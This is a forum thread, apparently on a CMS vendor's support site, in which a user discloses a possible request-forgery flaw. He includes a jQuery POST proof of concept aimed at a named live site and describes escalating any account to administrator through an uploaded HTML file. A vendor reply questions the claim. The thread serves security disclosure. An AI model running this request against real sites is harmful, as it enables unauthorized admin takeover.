Candidate security issue that allows full control at admin level

Peter Munkholm

This is only updating a custom field for the current user. But I think we can all see the possibilities. The only thing preventing this from being run from foreign websites is the access allow origin header.
Otherwise, if you know the field names to update, any field can be updated from anywhere on the website capable of holding a standard HTML document.

<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.2/jquery.min.js"></script>

<script>
  $(document).ready(function () {
    $.ajax({
      method: "POST",
      url: "http://gottfred.dk/Default.aspx?ID=2321&Purge=True",
      data: {
        "UserManagementForm": "1",
        "CustomField.AccessUser_AccessUser_Startpakke": "True",
        "HiddenField.CustomField.AccessUser_AccessUser_Startpakke": "True"
      }
    });
  });
</script>


Replies

 
Nicolai Høeg Pedersen

Not sure I fully understand...

If you are logged in as a user, you can update information on that user?

 
Peter Munkholm

I succeeded in adding myself as a newsletter subscriber to the administrator group. In theory I could have added every single user in the database, just by looping through a number sequence. This can potentially give every user profile in the solution full admin rights.

 
Peter Munkholm

All I need to gain admin rights is a user on the server (a newsletter subscriber will do) and a way of uploading an HTML file. The Forms module with file upload will do.

 
Nicolai Høeg Pedersen

Hi Peter

The page you are submitting "UserManagementForm" to contains the user management module? The code above will only update the currently logged-in user, as I see it.

 
